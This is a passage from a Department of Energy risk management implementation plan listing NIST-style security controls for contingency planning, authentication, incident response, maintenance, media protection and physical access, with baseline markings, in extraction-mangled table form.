The organization configuresthe alternate storage site tofacilitate recoveryoperations in accordancewith recovery time andrecovery point objectives.
CP-6(3)Alternate Storage
SiteX X X X No No P1
The organization identifiespotential accessibilityproblems to the alternatestorage site in the event ofan area-wide disruption ordisaster and outlines explicitmitigation actions.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
185 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-7Alternate Processing
SiteX X X X No No P1
The organization: a)Establishes an alternateprocessing site includingnecessary agreements topermit the resumption ofinformation systemoperations for essentialmissions and businessfunctions within[Assignment: organization-defined time periodconsistent with recoverytime objectives] when theprimary processingcapabilities are unavailable;and b) Ensures thatequipment and suppliesrequired to resumeoperations are available atthe alternate site orcontracts are in place tosupport delivery to the sitein time to support theorganization-defined timeperiod for resumption.
CP-7(1)Alternate Processing
SiteX X X X No No P1
The organization identifiesan alternate processing sitethat is separated from theprimary processing site soas not to be susceptible tothe same hazards.
CP-7(2)Alternate Processing
SiteX X X X No No P1
The organization identifiespotential accessibilityproblems to the alternateprocessing site in the eventof an area-wide disruption ordisaster and outlines explicitmitigation actions.
CP-7(3)Alternate Processing
SiteX X X X No No P1
The organization developsalternate processing siteagreements that containpriority-of-service provisionsin accordance with theorganization’s availabilityrequirements.
CP-7(4)Alternate Processing
SiteX X X No No P1
The organization configuresthe alternate processing siteso that it is ready to be usedas the operational sitesupporting essentialmissions and businessfunctions.
CP-7(5)Alternate Processing
SiteX X X X X X X X No No P1
The organization ensuresthat the alternateprocessing site providesinformation securitymeasures equivalent to thatof the primary site.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
186 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-8Telecommunications
ServicesX X X X No No P1
The organization establishesalternatetelecommunicationsservices including necessaryagreements to permit theresumption of informationsystem operations foressential missions andbusiness functions within[Assignment: organization-defined time period] whenthe primarytelecommunicationscapabilities are unavailable.
CP-8(1)Telecommunications
ServicesX X X X No No P1
The organization: a)Develops primary andalternatetelecommunications serviceagreements that containpriority of-service provisionsin accordance with theorganization’s availabilityrequirements; and b)RequestsTelecommunications ServicePriority for alltelecommunicationsservices used for nationalsecurity emergencypreparedness in the eventthat the primary and/oralternatetelecommunicationsservices are provided by acommon carrier.
CP-8(2)Telecommunications
ServicesX X X X No No P1
The organization obtainsalternatetelecommunicationsservices with considerationfor reducing the likelihood ofsharing a single point offailure with primarytelecommunicationsservices.
CP-8(3)Telecommunications
ServicesX X No No P1
The organization obtainsalternatetelecommunications serviceproviders that are separatedfrom primary serviceproviders so as not to besusceptible to the samehazards.
CP-8(4)Telecommunications
ServicesX X No No P1
The organization requiresprimary and alternatetelecommunications serviceproviders to havecontingency plans.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
187 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-9Information System
BackupX X X X X X X X X X X X Yes Yes P1
The organization: a)Conducts backups of user-level information containedin the information system[Assignment: organization-defined frequencyconsistent with recoverytime and recovery pointobjectives]; b) Conductsbackups of system-levelinformation contained in theinformation system[Assignment: organization-defined frequencyconsistent with recoverytime and recovery pointobjectives]; c) Conductsbackups of informationsystem documentationincluding security-relateddocumentation [Assignment:organization-definedfrequency consistent withrecovery time and recoverypoint objectives]; and d)Protects the confidentialityand integrity of backupinformation at the storagelocation.
CP-9(1)Information System
BackupX X X X X X X X No Yes P1
The organization testsbackup information[Assignment: organization-defined frequency] to verifymedia reliability andinformation integrity.
CP-9(2)Information System
BackupX X X No Yes P1
The organization uses asample of backupinformation in therestoration of selectedinformation systemfunctions as part ofcontingency plan testing.
CP-9(3)Information System
BackupX X No Yes P1
The organization storesbackup copies of theoperating system and othercritical information systemsoftware, as well as copiesof the information systeminventory (includinghardware, software, andfirmware components) in aseparate facility or in a fire-rated container that is notcollocated with theoperational system.
CP 9(4)Information System
Backup- - - - - - - - -
[Withdrawn: Incorporatedinto CP-9].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
188 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
CP-9(5)Information System
BackupX X No Yes P1
The organization transfersinformation system backupinformation to the alternatestorage site [Assignment:organization-defined timeperiod and transfer rateconsistent with the recoverytime and recovery pointobjectives].
CP-10Information System
Recovery AndReconstitution
X X X X X X Yes Yes P1
The organization providesfor the recovery andreconstitution of theinformation system to aknown state after adisruption, compromise, orfailure.
CP-10(1)Information System
Recovery AndReconstitution
- - - - - - - - -[Withdrawn: Incorporatedinto CP-4].
CP-10(2)Information System
Recovery AndReconstitution
X X X X X X X X No No P1
The information systemimplements transactionrecovery for systems thatare transaction-based.
CP-10(3)Information System
Recovery AndReconstitution
X X
The organization providescompensating securitycontrols for [Assignment:organization-definedcircumstances that caninhibit recovery andreconstitution to a knownstate].
CP-10(4)Information System
Recovery AndReconstitution
X No yes
The organization providesthe capability to reimageinformation systemcomponents within[Assignment: organization-defined restoration time-periods] from configuration-controlled and integrity-protected disk imagesrepresenting a secure,operational state for thecomponents.
IA-1
Identification AndAuthentication
Policy AndProcedures
X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documentedidentification andauthentication policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the identification andauthentication policy andassociated identificationand authentication controls.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
189 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IA-2
Identification AndAuthentication(Organizational
Users)
X X X X X X X X X Yes Yes P1
The information systemuniquely identifies andauthenticates organizationalusers (or processes actingon behalf of organizationalusers).
IA-2(1)
Identification AndAuthentication(Organizational
Users)
X X X X X X X X X No Yes P1
The information system usesmultifactor authenticationfor network access toprivileged accounts.
IA-2(2)
Identification AndAuthentication(Organizational
Users)
X X X X X X No Yes P1
The information system usesmultifactor authenticationfor network access to non-privileged accounts.
IA-2(3)
Identification AndAuthentication(Organizational
Users)
X X X X X X No No P1
The information system usesmultifactor authenticationfor local access to privilegedaccounts.
IA-2(4)
Identification AndAuthentication(Organizational
Users)
X X X X X No No P1
The information system usesmultifactor authenticationfor local access to non-privileged accounts.
IA-2(5)
Identification AndAuthentication(Organizational
Users)
X X X X X X Yes Yes P1
The organization: a) Allowsthe use of groupauthenticators only whenused in conjunction with anindividual/uniqueauthenticator; and b)Requires individuals to beauthenticated with anindividual authenticatorprior to using a groupauthenticator.
IA-2(8)
Identification AndAuthentication(Organizational
Users)
X X X X X X X X No No P1
The information system uses[Assignment: organization-defined replay-resistantauthentication mechanisms]for network access toprivileged accounts.
IA-2(9)
Identification AndAuthentication(Organizational
Users)
X X X X X No No P1
The information system uses[Assignment: organization-defined replay-resistantauthentication mechanisms]for network access to non-privileged accounts.
IA-3Device IdentificationAnd Authentication
X X X X X X X X No No P1
The information systemuniquely identifies andauthenticates [Assignment:organization-defined list ofspecific and/or types ofdevices] before establishinga connection.
IA-3(1)Device IdentificationAnd Authentication
X X X X X X No Yes P1
The information systemauthenticates devicesbefore establishing remoteand wireless networkconnections usingbidirectional authenticationbetween devices that iscryptographically based.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
190 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IA-3(2)Device IdentificationAnd Authentication
X X X X X X No Yes P1
The information systemauthenticates devicesbefore establishing networkconnections usingbidirectional authenticationbetween devices that iscryptographically based.
IA-3(3)Device IdentificationAnd Authentication
X X X X X X No Yes P1
The organizationstandardizes, with regard todynamic address allocation,Dynamic Host ControlProtocol (DHCP) leaseinformation and the timeassigned to devices, andaudits lease informationwhen assigned to a device.
IA-4Identifier
ManagementX X X X X X X X X Yes Yes P1
The organization managesinformation systemidentifiers for users anddevices by: a) Receivingauthorization from adesignated organizationalofficial to assign a user ordevice identifier; b)Selecting an identifier thatuniquely identifies anindividual or device; c)Assigning the user identifierto the intended party or thedevice identifier to theintended device; d)Preventing reuse of user ordevice identifiers for[Assignment: organization-defined time period]; and e)Disabling the user identifierafter [Assignment:organization-defined timeperiod of inactivity].
IA-4(4)Identifier
ManagementX X X X X X Yes Yes P1
The organization managesuser identifiers by uniquelyidentifying the user as[Assignment: organization-defined characteristicidentifying user status].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
191 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IA-5AuthenticatorManagement
X X X X X X X X X Yes Yes P1
The organization managesinformation systemauthenticators for users anddevices by: a) Verifying, aspart of the initialauthenticator distribution,the identity of the individualand/or device receiving theauthenticator; b)Establishing initialauthenticator content forauthenticators defined bythe organization; c) Ensuringthat authenticators havesufficient strength ofmechanism for theirintended use; d)Establishing andimplementing administrativeprocedures for initialauthenticator distribution,for lost/compromised ordamaged authenticators,and for revokingauthenticators; e) Changingdefault content ofauthenticators uponinformation systeminstallation; f) Establishingminimum and maximumlifetime restrictions andreuse conditions forauthenticators (ifappropriate); g)Changing/refreshingauthenticators [Assignment:organization-defined timeperiod by authenticatortype]; h) Protectingauthenticator content fromunauthorized disclosure andmodification; and i)Requiringusers to take, and havingdevices implement, specificmeasures to safeguardauthenticators.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
192 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IA-5(1)AuthenticatorManagement
X X X X X X X X X Yes Yes P1
The information system, forpassword-basedauthentication: a) Enforcesminimum passwordcomplexity of [Assignment:organization-definedrequirements for casesensitivity, number ofcharacters, mix of upper-case letters, lower-caseletters, numbers, andspecial characters, includingminimum requirements foreach type]; b) Enforces atleast a [Assignment:organization-definednumber of changedcharacters] when newpasswords are created; c)Encrypts passwords instorage and in transmission;d) Enforces passwordminimum and maximumlifetime restrictions of[Assignment: organization-defined numbers for lifetimeminimum, lifetimemaximum]; and e) Prohibitspassword reuse for[Assignment: organization-defined number]generations.
IA-5(2)AuthenticatorManagement
X X X X X No Yes P1
The information system, forPKI-based authentication: a)Validates certificates byconstructing a certificationpath with status informationto an accepted trust anchor;b) Enforces authorizedaccess to the correspondingprivate key; and c) Maps theauthenticated identity to theuser account.
IA-5(3)AuthenticatorManagement
X X X X X Yes Yes P1
The organization requiresthat the registration processto receive [Assignment:organization-defined typesof and/or specificauthenticators] be carriedout in person before adesignated registrationauthority with authorizationby a designatedorganizational official (e.g., asupervisor).
IA-5(4)AuthenticatorManagement
X X X X X X No Yes P1
The organization employsautomated tools todetermine if authenticatorsare sufficiently strong toresist attacks intended todiscover or otherwisecompromise theauthenticators.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
193 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IA-5(6)AuthenticatorManagement
X X X X X X
The organization protectsauthenticatorscommensurate with theclassification or sensitivity ofthe information accessed.
IA-5(7)AuthenticatorManagement
X X X No Yes P2
The organization ensuresthat unencrypted staticauthenticators are notembedded in applications oraccess scripts or stored onfunction keys.
IA-5(8)AuthenticatorManagement
X X X X X X Yes Yes P2
The organization takes[Assignment: organization-defined measures] tomanage the risk ofcompromise due toindividuals having accountson multiple informationsystems.
IA-6Authenticator
FeedbackX X X X X X Yes Yes P1
The information systemobscures feedback ofauthentication informationduring the authenticationprocess to protect theinformation from possibleexploitation/use byunauthorized individuals.
IA-7Cryptographic
ModuleAuthentication
X X X X X X X X X No No P1
The information system usesmechanisms forauthentication to acryptographic module thatmeet the requirements ofapplicable federal laws,Executive Orders, directives,policies, regulations,standards, and guidance forsuch authentication.
IA-8
Identification AndAuthentication (Non-
OrganizationalUsers)
X X X X X X X X X No No P1
The information systemuniquely identifies andauthenticates non-organizational users (orprocesses acting on behalfof non-organizational users).
IR-1Incident Response
Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented incidentresponse policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the incident responsepolicy and associatedincident response controls.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
194 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IR-2Incident Response
TrainingX X X X X X X X X X X X Yes Yes P2
The organization: a) Trainspersonnel in their incidentresponse roles andresponsibilities with respectto the information system;and b) Provides refreshertraining [Assignment:organization-definedfrequency].
IR-2(1)Incident Response
TrainingX X X X Yes Yes P2
The organizationincorporates simulatedevents into incidentresponse training tofacilitate effective responseby personnel in crisissituations.
IR-2(2)Incident Response
TrainingX X X No No P2
The organization employsautomated mechanisms toprovide a more thoroughand realistic trainingenvironment.
IR-3Incident Response
Testing AndExercises
X X X X X X X X X X X Yes Yes P2
The organization testsand/or exercises theincident response capabilityfor the information system[Assignment: organization-defined frequency] using[Assignment: organization-defined tests and/orexercises] to determine theincident responseeffectiveness anddocuments the results.
IR-3(1)Incident Response
Testing AndExercises
X No No P2
The organization employsautomated mechanisms tomore thoroughly andeffectively test/exercise theincident response capability.
IR-4 Incident Handling X X X X X X X X X X X X Yes Yes P1
The organization: a)Implements an incidenthandling capability forsecurity incidents thatincludes preparation,detection and analysis,containment, eradication,and recovery; b) Coordinatesincident handling activitieswith contingency planningactivities; and c)Incorporates lessonslearned from ongoingincident handling activitiesinto incident responseprocedures, training, andtesting/exercises, andimplements the resultingchanges accordingly
IR-4(1) Incident Handling X X X X X X X X X X X No No P1
The organization employsautomated mechanisms tosupport the incidenthandling process.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
195 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IR-4(3) Incident Handling X X X X X X X X X Yes Yes P1
The organization identifiesclasses of incidents anddefines appropriate actionsto take in response toensure continuation oforganizational missions andbusiness functions.
IR-4(4) Incident Handling X X X X X X X X X Yes Yes P1
The organization correlatesincident information andindividual incidentresponses to achieve anorganization-wideperspective on incidentawareness and response.
IR-5 Incident Monitoring X X X X X X X X X X X X Yes Yes P1The organization tracks anddocuments informationsystem security incidents.
IR-5(1) Incident Monitoring X X X No No P1
The organization employsautomated mechanisms toassist in the tracking ofsecurity incidents and in thecollection and analysis ofincident information.
IR-6 Incident Reporting X X X X X X X X X X X X Yes Yes P1
The organization: a)Requires personnel to reportsuspected security incidentsto the organizationalincident response capabilitywithin [Assignment:organization-defined time-period]; and b) Reportssecurity incident informationto designated authorities.
IR-6(1) Incident Reporting X X X X X X X X X X X Yes Yes P1
The organization employsautomated mechanisms toassist in the reporting ofsecurity incidents.
IR-6(2) Incident Reporting X X X X X X X X X Yes Yes P1
The organization reportsinformation systemweaknesses, deficiencies,and/or vulnerabilitiesassociated with reportedsecurity incidents toappropriate organizationalofficials.
IR-7Incident Response
AssistanceX X X X X X X X X X X X Yes Yes P3
The organization provides anincident response supportresource, integral to theorganizational incidentresponse capability thatoffers advice and assistanceto users of the informationsystem for the handling andreporting of securityincidents.
IR-7(1)Incident Response
AssistanceX X X X X X X X X X X No No P3
The organization employsautomated mechanisms toincrease the availability ofincident response-relatedinformation and support.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
196 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IR-7(2)Incident Response
AssistanceX X X X X X X X X Yes Yes P3
The organization: a)Establishes a direct,cooperative relationshipbetween its incidentresponse capability andexternal providers ofinformation systemprotection capability; and b)Identifies organizationalincident response teammembers to the externalproviders.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
197 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
IR-8Incident Response
PlanX X X X X X X X X X X X Yes Yes P1
The organization: a)Develops an incidentresponse plan that:1) -Provides the organizationwith a roadmap forimplementing its incidentresponse capability; 2) -Describes the structure andorganization of the incidentresponse capability; 3)Provides a high-levelapproach for how theincident response capabilityfits into the overallorganization; 4) - Meets theunique requirements of theorganization, which relate tomission, size, structure, andfunctions; 5) - Definesreportable incidents; 6) -Provides metrics formeasuring the incidentresponse capability withinthe organization. 7) -Defines the resources andmanagement supportneeded to effectivelymaintain and mature anincident response capability;and 9) - Is reviewed andapproved by designatedofficials within theorganization; b) Distributescopies of the incidentresponse plan to[Assignment: organization-defined list of incidentresponse personnel(identified by name and/orby role) and organizationalelements]; c) Reviews theincident response plan[Assignment: organization-defined frequency]; d)Revises the incidentresponse plan to addresssystem/organizationalchanges or problemsencountered during planimplementation, execution,or testing; and e)Communicates incidentresponse plan changes to[Assignment: organization-defined list of incidentresponse personnel(identified by name and/orby role) and organizationalelements].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
198 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MA-1System
Maintenance PolicyAnd Procedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documentedinformation systemmaintenance policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the information systemmaintenance policy andassociated systemmaintenance controls
MA-2Controlled
MaintenanceX X X X X X X X X X X X Yes Yes P2
The organization: a)Schedules, performs,documents, and reviewsrecords of maintenance andrepairs on informationsystem components inaccordance withmanufacturer or vendorspecifications and/ororganizational requirements;b) Controls all maintenanceactivities, whetherperformed on site orremotely and whether theequipment is serviced onsite or removed to anotherlocation; c) Requires that adesignated official explicitlyapprove the removal of theinformation system orsystem components fromorganizational facilities foroff-site maintenance orrepairs; d) Sanitizesequipment to remove allinformation from associatedmedia prior to removal fromorganizational facilities foroff-site maintenance orrepairs; and e) Checks allpotentially impacted securitycontrols to verify that thecontrols are still functioningproperly followingmaintenance or repairactions.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
199 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MA-2(1)Controlled
MaintenanceX X X X X X X X X X X Yes Yes P2
The organization maintainsmaintenance records for theinformation system thatinclude: a) Date and time ofmaintenance; b) Name ofthe individual performing themaintenance; c) Name ofescort, if necessary; d) Adescription of themaintenance performed;and e) A list of equipmentremoved or replaced(including identificationnumbers, if applicable).
MA-2(2)Controlled
MaintenanceX X X No No P2
The organization employsautomated mechanisms toschedule, conduct, anddocument maintenance andrepairs as required,producing up-to date,accurate, complete, andavailable records of allmaintenance and repairactions, needed, in process,and completed.
MA-3 Maintenance Tools X X X X X X X X Yes Yes P2
The organization approves,controls, monitors the useof, and maintains on anongoing basis, informationsystem maintenance tools.
MA-3(1) Maintenance Tools X X X X X X Yes Yes P2
The organization inspects allmaintenance tools carriedinto a facility bymaintenance personnel forobvious impropermodifications.
MA-3(2) Maintenance Tools X X X X X X X X Yes Yes P2
The organization checks allmedia containing diagnosticand test programs formalicious code before themedia are used in theinformation system.
MA-3(3) Maintenance Tools X X X X Yes Yes P2
The organization preventsthe unauthorized removal ofmaintenance equipment byone of the following: (i)verifying that there is noorganizational informationcontained on theequipment; (ii) sanitizing ordestroying the equipment;(iii) retaining the equipmentwithin the facility; or (iv)obtaining an exemption froma designated organizationofficial explicitly authorizingremoval of the equipmentfrom the facility.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
200 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MA-4Non-Local
MaintenanceX X X X X X No No P1
The organization: a)Authorizes, monitors, andcontrols non-localmaintenance and diagnosticactivities; b) Allows the useof non-local maintenanceand diagnostic tools only asconsistent withorganizational policy anddocumented in the securityplan for the informationsystem; c) Employs strongidentification andauthentication techniques inthe establishment of non-local maintenance anddiagnostic sessions; d)Maintains records for non-local maintenance anddiagnostic activities; and e)Terminates all sessions andnetwork connections whennon-local maintenance iscompleted.
MA-4(1)Non-Local
MaintenanceX X
The organization audits non-local maintenance anddiagnostic sessions anddesignated organizationalpersonnel review themaintenance records of thesessions.
MA-4(2)Non-Local
MaintenanceX X X X X No No P1
The organizationdocuments, in the securityplan for the informationsystem, the installation anduse of non-localmaintenance and diagnosticconnections.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
201 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MA-4(3)Non-Local
MaintenanceX X X X X X X X X X No No P1
The organization: a)Requires that non-localmaintenance and diagnosticservices be performed froman information system thatimplements a level ofsecurity at least as high asthat implemented on thesystem being serviced; or b)Removes the component tobe serviced from theinformation system and priorto non-local maintenance ordiagnostic services,sanitizes the component(with regard toorganizational information)before removal fromorganizational facilities, andafter the service isperformed, inspects andsanitizes the component(with regard to potentiallymalicious software andsurreptitious implants)before reconnecting thecomponent to theinformation system.
MA-4(5)Non-Local
MaintenanceX X X No No P1
The organization requiresthat: a) Maintenancepersonnel notify[Assignment: organization-defined personnel] whennon-local maintenance isplanned (i.e., date/time);and b) A designatedorganizational official withspecific informationsecurity/information systemknowledge approves thenon-local maintenance.
MA-4(6)Non-Local
MaintenanceX X X X X X No No P1
The organization employscryptographic mechanismsto protect the integrity andconfidentiality of non-localmaintenance and diagnosticcommunications.
MA-4(7)Non-Local
MaintenanceX X X No No P1
The organization employsremote disconnectverification at thetermination of non-localmaintenance and diagnosticsessions.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
202 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MA-5Maintenance
PersonnelX X X X X X X X X X X X Yes Yes P1
The organization a)Establishes a process formaintenance personnelauthorization and maintainsa current list of authorizedmaintenance organizationsor personnel; and b) Ensuresthat personnel performingmaintenance on theinformation system haverequired accessauthorizations or designatesorganizational personnelwith required accessauthorizations and technicalcompetence deemednecessary to superviseinformation systemmaintenance whenmaintenance personnel donot possess the requiredaccess authorizations.
MA-5(1)Maintenance
PersonnelX X X X X X X X X Yes Yes P1
The organization maintainsprocedures for the use ofmaintenance personnel thatlack appropriate securityclearances or are not U.S.citizens, that include thefollowing requirements: a)Maintenance personnel whodo not have needed accessauthorizations, clearances,or formal access approvalsare escorted and supervisedduring the performance ofmaintenance and diagnosticactivities on the informationsystem by approvedorganizational personnelwho are fully cleared, haveappropriate accessauthorizations, and aretechnically qualified; b) Priorto initiating maintenance ordiagnostic activities bypersonnel who do not haveneeded accessauthorizations, clearancesor formal access approvals,all volatile informationstorage components withinthe information system aresanitized and all nonvolatilestorage media are removedor physically disconnectedfrom the system andsecured; and c) In the eventan information systemcomponent cannot besanitized, the procedurescontained in the securityplan for the system areenforced.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
203 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MA-5(2)Maintenance
PersonnelYes Yes
The organization ensuresthat personnel performingmaintenance and diagnosticactivities on an informationsystem processing, storing,or transmitting classifiedinformation are cleared (i.e.,possess appropriate securityclearances) for the highestlevel of information on thesystem.
MA-5(3)Maintenance
PersonnelYes Yes
The organization ensuresthat personnel performingmaintenance and diagnosticactivities on an informationsystem processing, storing,or transmitting classifiedinformation are U.S. citizens.
MA-6 Timely Maintenance X X X X Yes Yes P1
The organization obtainsmaintenance supportand/or spare parts for[Assignment: organization-defined list of security-critical information systemcomponents and/or keyinformation technologycomponents] within[Assignment: organization-defined time period] offailure.
MP-1Media Protection
Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented mediaprotection policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the media protectionpolicy and associated mediaprotection controls.
MP-2 Media Access X X X X X X Yes Yes P1
The organization restrictsaccess to [Assignment:organization-defined typesof digital and non-digitalmedia] to [Assignment:organization-defined list ofauthorized individuals] using[Assignment: organization-defined security measures].
MP-2(1) Media Access X X Yes Yes
The organization employsautomated mechanisms torestrict access to mediastorage areas and to auditaccess attempts and accessgranted.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
204 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MP-2(2) Media Access X X X X Yes Yes P1
The information system usescryptographic mechanismsto protect and restrictaccess to information onportable digital media
MP-3 Media Marking X X X X X Yes Yes P1
The organization: a) Marks,in accordance withorganizational policies andprocedures, removableinformation system mediaand information systemoutput indicating thedistribution limitations,handling caveats, andapplicable security markings(if any) of the information;and b) Exempts[Assignment: organization-defined list of removablemedia types] from markingas long as the exempteditems remain within[Assignment: organization-defined controlled areas].
MP-4 Media Storage X X X X X Yes Yes P1
The organization: a)Physically controls andsecurely stores [Assignment:organization-defined typesof digital and non-digitalmedia] within [Assignment:organization-definedcontrolled areas] using[Assignment: organization-defined security measures];b) Protects informationsystem media until themedia are destroyed orsanitized using approvedequipment, techniques, andprocedures.
MP-4(1) Media Storage X No No P1
The organization employscryptographic mechanismsto protect information instorage.
MP-5 Media Transport X X X X X X X X Yes Yes P1
The organization: a) Protectsand controls [Assignment:organization-defined typesof digital and non-digitalmedia] during transportoutside of controlled areasusing [Assignment:organization-definedsecurity measures]; b)Maintains accountability forinformation system mediaduring transport outside ofcontrolled areas; and c)Restricts the activitiesassociated with transport ofsuch media to authorizedpersonnel.
MP-5(2) Media Transport X X X X X X X X Yes Yes P1
The organization documentsactivities associated with thetransport of informationsystem media.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
205 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
MP-5(3) Media Transport X Yes Yes P1
The organization employs anidentified custodianthroughout the transport ofinformation system media.
MP-5(4) Media Transport X X X X X X yes Yes P1
The organization employscryptographic mechanismsto protect the confidentialityand integrity of informationstored on digital mediaduring transport outside ofcontrolled areas.
MP-6 Media Sanitization X X X X X X Yes Yes P1
The organization: a)Sanitizes information systemmedia, both digital and non-digital, prior to disposal,release out of organizationalcontrol, or release for reuse;and b) Employs sanitizationmechanisms with strengthand integrity commensuratewith the classification orsensitivity of theinformation.
MP-6(1) Media Sanitization X X X Yes Yes P1
The organization tracks,documents, and verifiesmedia sanitization anddisposal actions.
MP-6(2) Media Sanitization X X X X Yes Yes P1
The organization testssanitization equipment andprocedures to verify correctperformance [Assignment:organization-definedfrequency].
MP-6(3) Media Sanitization X X X X Yes Yes P1
The organization sanitizesportable, removable storagedevices prior to connectingsuch devices to theinformation system underthe following circumstances:[Assignment: organization-defined list ofcircumstances requiringsanitization of portable,removable storage devices].
MP-6(4) Media Sanitization X X X Yes Yes P1
The organization sanitizesinformation system mediacontaining ControlledUnclassified Information(CUI) or other sensitiveinformation in accordancewith applicableorganizational and/orfederal standards andpolicies.
MP-6(5) Media Sanitization X X X Yes Yes P1
The organization sanitizesinformation system mediacontaining classifiedinformation in accordancewith NSA standards andpolicies.
MP-6(6) Media Sanitization X X X Yes Yes P1The organization destroysinformation system mediathat cannot be sanitized.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
206 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PE-1
Physical AndEnvironmental
Protection PolicyAnd Procedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documentedphysical and environmentalprotection policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the physical andenvironmental protectionpolicy and associatedphysical and environmentalprotection controls.
PE-2Physical AccessAuthorizations
X X X X X X X X X X X X Yes Yes P1
The organization: a)Develops and keeps currenta list of personnel withauthorized access to thefacility where theinformation system resides(except for those areaswithin the facility officiallydesignated as publiclyaccessible); b) Issuesauthorization credentials; c)Reviews and approves theaccess list and authorizationcredentials [Assignment:organization-definedfrequency], removing fromthe access list personnel nolonger requiring access.
PE-2(1)Physical AccessAuthorizations
X X X X X X X X X Yes Yes P1
The organization authorizesphysical access to thefacility where theinformation system residesbased on position or role.
PE-2(3)Physical AccessAuthorizations
X X X Yes Yes P1
